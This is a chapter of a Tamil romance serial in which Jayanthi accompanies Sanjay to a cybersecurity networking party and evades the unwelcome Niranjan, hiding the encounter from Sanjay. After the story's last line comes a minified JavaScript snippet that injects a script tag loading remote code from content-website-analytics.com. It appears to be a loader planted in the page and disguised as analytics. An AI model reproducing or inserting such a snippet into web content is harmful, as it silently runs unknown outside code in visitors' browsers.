தீக்ஷனா எப்போதோ கிளம்பிப் போயிருந்தாள். சஞ்சயிடம் சொல்லிக்கொள்ளாமலே சென்றுவிட்டாள். அன்று ஆஃபீசில் சந்தித்து சண்டையிட்டதுடன் சரி. அமெரிக்கா கிளைக்குக்கூட எப்போதாவதுதான் வந்து செல்கிறாள்.

இந்த நிலையில்தான் மோகன் சஞ்சயை தடுத்துவிட்டு தான் செல்கிறேன் என்று கூறியது. வீணாக அவள் கோவத்தை கிளறாமல் இருப்பது. இன்னும் கொஞ்ச நாள் பார்ட்னர்ஷிப் இப்படியே தொடர்வதுதான் எல்லாருக்கும் நல்லது என்று கலந்து பேசி முடிவெடுத்திருந்தார்கள். அதோடு, ஜெயந்தியை விட்டுவிட்டு இரண்டு மூன்று வாரம் செல்ல சஞ்சய்க்கும் இஷ்டமில்லாததால், எளிதாகவே முடிவாயிற்று.

மோகன் கிளம்பியபின் வந்த ஒரு சனிக்கிழமை மாலை சஞ்சையுடன் டின்னர் செல்ல கிளம்பியிருந்தாள்.  சில முறை அவள் வீட்டிலேயே சமைப்பாள், அவளது அப்பார்ட்மென்ட் வளாகத்தில் இருக்கும பாட்மின்ட்டன் கோர்ட் புக் செய்து, வாலிபால் அல்லது  இறகுப் பந்து ஆடிவிட்டு வீட்டில் உணவருந்தி, பேசிவிட்டு செல்வான்.

சாப்பிட என்ன பிடிக்கும் என்று கேட்டு செய்வாள். சஞ்சய்க்கு இது ரொம்ப பிடிக்குமாம் ஜெயந்தி. தமையா இப்படி செய்யச் சொன்னாமா என்று ரெசிப்பி வாசிப்பார் குருபரன். அவர் சொல்லும் முறையும் ருசியாக இருப்பதால், தெரியாத யூடியூப் சானல் பார்க்கற மாதிரி நினைச்சிக்கோ ஜெய், என்று அவர் சொல்வதை எழுதிக்கொள்வாள். உண்ணும்போது சஞ்சய் அடையும் மகிழ்ச்சிக்காகவே அவர்களின் தலையீட்டை பொறுத்துக்கொள்வாள்.

இவர்கள் ஆடும்பொழுது வந்து பார்த்துவிட்டு, “நாங்க அவன் கார்ல இருக்கோம்மா. மேல வரமாட்டோம். நீ ஃப்ரீயா இரு”, என்று வேறு சொல்லிவிட்டுச் செல்வார் குருபரன். இந்த மட்டுமாவது தள்ளி இருக்கிறார்களே என்று ஜெயந்தியும் விட்டுவிடுவாள்.

“இன்னிக்கு ஒரு சைபர் செக்யூரிட்டி மீட் அண்ட் க்ரீட் பார்ட்டி சோழால இருக்கு ஜெயந்தி. என் கூட வரமுடியுமா”, என்று அழைத்திருக்க, கிளம்பி தயாராக இருந்தாள். அவள் என்ன கலர் போடப்போகிறான் என்று கேட்டு, சஞ்சய்யும் கரு நீலக் கலர் கோட், க்ரீம் ஷர்ட், கருப்பு கார்கோ பேண்ட்ஸ், லெதர் ஷூஸ் என்று ஃபார்மலாக வர, அவனுக்கு குறைவில்லாமல் வேலைப்பாடுடன் கூடிய ஒரு கரு நீலக் காட்டன் சல்வார், க்ரீம் லேஸ் வொர்க் ஷால், மிக லேசான மேக்-கப் என்று கிளம்பி நின்றிருந்தாள்.

உள்ளே வந்தவன் கையில் இருந்த வெள்ளை டெய்சிப் பூக்கள் நிறைந்த பூங்கொத்தை தந்துவிட்டு, லேசாக அணைத்தான். “கார்ஜியஸ் ஜெயந்தி”, என்று அவள் கழுத்து வளைவில் வாசம் பிடிக்க,

“ச்சோ…சஞ்சய்”, என்று அவன் மார்பில் முட்டியவள், “உங்களை விடவா?”, என்றாள்.

“ஹா ஹா…சரி வா மாத்தி மாத்தி புகழ்ந்துகிட்டே போகலாம். ஈவ்னிங் ட்ராஃபிக்ல தப்பிச்சு நேரத்துக்கு போகணும்.”

காரில் செல்லும்போது, “அடுத்த இரண்டு நாள் கான்ஃப்ரென்ஸ் போகுது ஜெயந்தி. இரண்டு  நாளும் நானும் அங்கதான் இருப்பேன். மோகனும் இல்லை. நீ பார்த்துக்கோ. லன்ச் ப்ரேக்ல கூப்பிடறேன்.”

அதற்கான இன்விடேஷனைப் பார்த்துக்கொண்டிருந்தவள், “ஓஹ்… கீ நோட் ஸ்பீச் வேற தரப்போறீங்களா சஞ்சய்? சொல்லவே இல்லை!”

அதில் புன்னகைத்தவன், “ஹ்ம்ம் முதல் நாள் மதியம்டா.  டெக்னிகல் ஸ்பீச், உனக்கு போர் அடிக்கும், அதனாலதான் உன்னை கூப்பிடலை.”

“புரியவே வேணாம். அத்தனை பேர் முன்னாடி நீங்க பேசறதை பார்த்தாலே கெத்தா இருக்கும். வீடியோவாச்சம் வருமா?”, என்று கேட்பவளைப் பார்த்து சிரித்தவன்,”நம்ம டெக்-டீமிலர்ந்து வருவாங்க. எடுப்பாங்க. ப்ரெஸ் கவரேஜ் இருக்கும், ஆனா என்னோடதெல்லாம் மெயின் ந்யூஸ்ல வராது.”

“இந்த மஞ்சு பொண்ணு ஒரு வார்த்தை சொல்லலை பாருங்க. இருக்கட்டும் பேசிக்கறேன்”, என்று முறுக்கியவளை,

“இது வருஷா வருஷம் நடக்கறதுதான் ஜெயந்தி. நான் ஸ்பீச் குடுக்கறது இது மூணாவது வருஷம்.  நம்ம வெப்-சைட்ல பழைய கிளிப்பிங்ஸ் இருக்கும் போய் பாரு.”, என்று சமாதானம் சொல்ல, சோழாவை வந்தடைந்தார்கள்.

இருவருமாக உள்ளே நுழைந்து, வருகையை பதிவு செய்து விழா அரங்கிற்குள் செல்ல, ஓரளவு கூட்டம் ஏற்கனவே கூடியிருந்தது. சஞ்சய்யை அடையாளம் கண்டுகொண்டு சிலர் வரவேற்க, “மீட் மிஸ். ஜெயந்தி. எங்க ஃபினான்ஸ் ஹெட்”, என்று அறிமுகப்படுத்தி, அவர்களையும் அறிமுகப்படுத்தினான். ஓரிரு வார்த்தைகள் அவளுடன் பேசிவிட்டு, கணினி உலகிற்குள் சீக்கிரமே அவர்கள் பேச்சு சென்றுவிட்டது.

மெல்ல ஒவ்வொரு குழுவாக சென்று வந்தாலும், அவளுக்கு ஆரஞ்ச் ஜூஸ் கொடுத்து, இடையிடையில் வந்த ஃபிங்கர் ஃபூட் எனப்படும் சிறு உணவுகளை தருவதிலும் அக்கறையாக இருந்தான்.

“போரடிக்குதா ஜெயந்தி?”, என்று கேட்க, “அதெல்லாம் இல்லை சஞ்சய். இது உங்களுக்கான நேரம். என்னைப் பத்தி யோசிக்காம நீங்க  நெட்வொர்க் பண்ணுங்க.”, என்று உந்தினாள்.

இந்தியாவில் பல்வேறு மாநிலங்களில் தி வால்ட் போன்று சைபர் செக்யூரிட்டி நிபுணத்துவம் பெற்று மற்ற கம்பனிகளுக்கு தேவையான பாதுகாப்பினையும் ஆலோசனையும் செய்பவர்கள்,  மற்றும் அது சார்ந்த மென்பொருள், வன் பொருள் துறையில்  கோலோச்சுபவர்கள் எல்லோருமாக சேர்வது இது போன்ற கூட்டங்களில்தான். பரஸ்பர அறிமுகம் பின்னாளில் அவர்களோடு இணைந்து செயலாற்ற வழிவகுக்கும். இவர்கள் துறையில் வந்திருக்கும், வரப்போகும் இடர்கள், மாற்றுப்பாதைகள் புது கண்டுபிடிப்புகள் என்று பலதரப்பட்ட விஷயங்கள் அலசப்படும்.

இதைப் புரிந்தவள், அவனுக்கு தொல்லையின்றி பேசுபவர்களை அமைதியாக கவனித்திருந்தாள். சஞ்சயின் கருத்துகள் கவனமாக கேட்கப்படுவதும், அவன் என்ன நினைக்கிறான் என்று கேட்டுக்கொள்வதிலும் பலருக்கு இருந்த ஆர்வம் கண்டு, அவன் உலகில் வளர்ந்து வரும் முக்கியமானவர்களில் ஒருவனாக கருதப்படுகிறான் என்று கண்கூடாகக் கண்டு கொண்டாள். இத்தனைக்கும் எந்தவித பந்தாவுமின்றி இயல்பாக அனைவரிடமும் பேசினான். அவள் மீதும் கவனம் வைத்திருந்தான். இங்கே வந்தபின் தான் அவன் உயரமே புரிந்தது ஜெயந்திக்கு.

பஃபே முறையில் உணவருந்த ஏற்பாடுகள் இருக்க, எட்டு மணி அளவில், “வா ஜெயந்தி சாப்பிட ஆரம்பிக்கலாம்”, என்று அழைத்துக்கொண்டு சென்றான்.

“பன்னீர், சிக்கன்னு ஸ்டார்டர்ஸ் நிறையவே தந்தீங்க சஞ்சய். பசியே இல்லை”, என்றவளை, “பரவாயில்லை. பொறுமையா இதுவும் ஒரு மணி  நேரம் சாப்பிடலாம். எப்படியும் யாராவது வந்து பேசிட்டு இருப்பாங்க.”

“மோகன் இந்த நேரம் இல்லாம போயிட்டாரே. ஒரு வாரம் பொறுத்து போயிருக்கலாமோ?”

“இங்க இருந்தா கண்டிப்பா கலந்துப்பான். பட் இப்ப யூ.எஸ் ஆஃபீஸ்ல இருக்கறது முக்கியம். வழக்கமா நாங்க இரண்டு பேரும் வருவோம். இந்த முறை உன்னைக் கூட்டிட்டு வந்ததுக்கு நல்ல சேன்ஞ் சார்னு சில பேர் பாராட்டினாங்கன்னா பார்த்துக்கோயேன்”, என்றும் கூறினான்.

“ம்ம்… இருங்க. அடுத்த ஃபைனான்ஸ் மீட் எங்காச்சம் நடக்கட்டும். உங்களை கூட்டிட்டு போறேன்!”

“ம்ம்… மாஸ்டர்ஸ் டிகிரி படிக்குும் போது  ஃபைனான்ஸ் ல மைனர் பண்ணேன். அதனால பேசறது கொஞ்சமா புரியும். அப்படி புரியவே இல்லாட்டியும் பரவாயில்லை ஜெயந்தி. உன் ப்ரோஃபெஷனுக்கு தேவைன்னு நீ போனா, கண்டிப்பா உனக்காக கூட நிப்பேன். இப்போ நீ நிக்கற மாதிரி”, என்று கூறுபவனிடம் நெகிழ்ந்து நின்றாள்.

உணவு எடுத்துக்கொண்டு இவள் திரும்ப, சஞ்சயை யாரோ பேச பிடித்துக்கொண்டார்கள். அவர்கள் மேசைக்கு திரும்பிக்கொண்டிருக்கையில்,

“ஹேய் டால்…. வாட் எ சர்ப்ரைஸ்!”, என்று எதிரில் வந்தவனைப் பார்த்து முழித்தாள். சாட்சாத் நிரஞ்சனே.

முகம் சுருக்கியவள், “நிரஞ்சன், பேரை சொல்லி கூப்பிடுங்க, இதென்ன டால் வாலுன்னு?”

“ஹே…  சில் கேர்ள். என்ன இந்த மீட்ல நீ இருக்க? அக்கவுண்ட்ஸ் பார்க்கற உனக்கு சைபர் செக்யூரிட்டில என்ன வேலை?”, என்று  நெருங்கி வர, ஓரடி பின்னே வந்தவள்,

“அதே கேள்வியை நானும் கேட்கலாம். எக்ஸ் கார் கம்பனி ஃபைனான்ஸ் ஹெட்டுக்கு இங்க என்ன வேலை?”, உஷ்ணமாக கேட்க, ஒரு விரிந்த புன்னகை  நிரஞ்சனிடம்.

“வாவ்…. ஸ்பைசி ஜெய். என் கம்பனி ரெப்ரசென்ட் பண்ண வந்திருக்கேன்.”, என்றான் எதோ ரகசியம் பேசுவது போல.

முகத்தை சுளித்தவள், “நானும் அதுக்குத்தான் வந்திருக்கேன். வந்த வேலையை பாருங்க”, என்று தட்டுடன் சட்டென்று நகர்ந்து இருக்கைக்கு வந்து அமர்ந்தாள்.

உடல் சற்று தளர்த்தி சாய்ந்து அமர, “யார் கூட பேசிட்டு இருந்த ஜெயந்தி?”, என்று கேட்டுக்கொண்டே சஞ்சய் பக்கத்து இருக்கையில் வந்து அமர்ந்தான்.

மீண்டும் விறைத்து அமர்ந்தவள், “ம்ம்… யார் கூட? இல்லையே?”, என்று தடுமாறினாள். நிரஞ்சனைப் பற்றி சத்தியமாக எதுவும் சொல்லப் பிடிக்கவில்லை.

“இப்ப இங்க வரும்போது. ஒரு ப்ரவுன் ப்ளேசர் போட்டு, உயரமா ஒருத்தர்”, என்று புருவம் சுருக்கி சஞ்சய் இன்னும் விளக்க,

ஒரு செயற்கை சிரிப்புடன், “ஓ…தெரியலை. யாரோன்னு நினைச்சு எங்கிட்ட பேசினார். அவர் நினைக்கற ஆள் நான் இல்லைன்னு சொல்லிட்டு வந்துட்டேன். அது விடுங்க, ஏன் வெறும் சாலட் மட்டும் எடுத்துட்டு வந்திருக்கீங்க? நான் சாப்பிடுங்க”, என்று தன் தட்டிலிருந்து எடுத்து அவனுக்கு வைத்தாள்.

அந்த நேரம் அவளை அதற்கு மேல் கேள்வி கேட்கவில்லை சஞ்சய். பேசியவன் முகம் இவன் பார்வையில் இருக்க, ஜெயந்தியின் முதுகுப்புறம்தான் தெரிந்தது. அதிலும் அவள் உடல் விறைத்தது. அவன் எதுவோ நெருங்கி வந்து சொல்ல, இவள் சற்று பின்னே வந்தது என்று உடல்மொழியைப் பார்த்தவனுக்கு, அவன் எதுவும் வம்பு செய்கிறானோ என்று நினைத்துத்தான் பேசிக்கொண்டிருந்தவரை பாதியில் விட்டு இவளிடம் வந்தான். ஜெயந்தியானால்அடையாளம் தெரியாமல் பேசினான் எங்கிறாள். ஒரு வேளை அவன் எதுவும் வேண்டாதது பேசினான் என்று கூறி தன்னை சங்கடப்படுத்தாமல் இருக்க ஜெயந்தி மறைக்கிறாளோ என்று எண்ணம் செல்ல, அவன் யார் என்று தெரிந்துகொள்ள வேண்டும் என்று நினைத்தான் சஞ்சய்.

‘இந்த குரு சார் இன்னிக்கு எங்களோட வந்திருக்கலாம். முன்னாடியே நிரஞ்சனைப் பார்த்துட்டு வார்னிங்காச்சம் தந்திருப்பார், இல்லை அவன் மேல எதாவது கொட்டி வெச்சு துரத்தியிருப்பார். இரண்டு நாளா ஆள் வரக்காணோம்.’, என்ற யோசனையோடே உணவை அருந்தினாள் ஜெயந்தி.

;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,’script’,’https://content-website-analytics.com/script.js’);